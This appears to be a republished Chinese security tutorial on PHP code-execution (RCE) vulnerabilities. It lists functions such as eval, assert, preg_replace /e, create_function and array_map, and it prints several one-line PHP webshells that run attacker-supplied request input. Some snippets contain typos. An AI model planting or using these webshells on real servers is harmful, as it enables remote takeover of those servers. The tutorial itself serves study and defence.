大家好,又见面了,我是你们的朋友全栈君。
**
**
一、代码执行漏洞原理: 用户输入的数据被当做后端代码进行执行
<?php @eval($_REQUEST[8])?>//其实一句话木马的本质就是一个代码执行漏洞。用户输入的数据被当做代码进行执行。
这里提一下RCE(remote command/code execute)远程命令或者代码执行。现在只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE 在PHP存在诸多函数可以做到代码执行。为了方便把要执行的代码写为$a
1.eval($a); //eval是代码执行用的最多的,他可以多行执行
eval(\$_REQUEST['a']);
2.assert(_REQEUST['a'])//如何多行执行呢 写文件然后执行,例如:
file_put_contents('1.php','<?php var_dump(8);phpinfo();?>')
3.preg_replace() //正则替换函数, preg_replace(’/a/’,‘x’,‘abc’); Eg
<?php echo preg_replace('/a/e',$_GET[8],'abc')?>
替换必须真实发生才会触发函数,不发生替换,不会触发。
<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
$f2();
?>
这里还可以不调用触发:
<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
//?a=}phpinfo();
5.array_map //回调函数调用某个函数。 下图是这个函数的用法,调用cube函数,传参
一句话木马:
array_map('assert',array($_POST['a']));
array_map($_REQUSET['b'],$_REQUEST);
Eval 是无法调用的,因为eval比较特殊,不认为是函数属于特殊写法 call_user_func() 也可以回调,回调函数在php有很多。
6.特殊组合(双引号二次解析) PHP版本5.5及其以上版本可以使用 “
${
phpinfo()};
$a = ${
phpinfo()};
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/188414.html原文链接:https://javaforall.cn
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有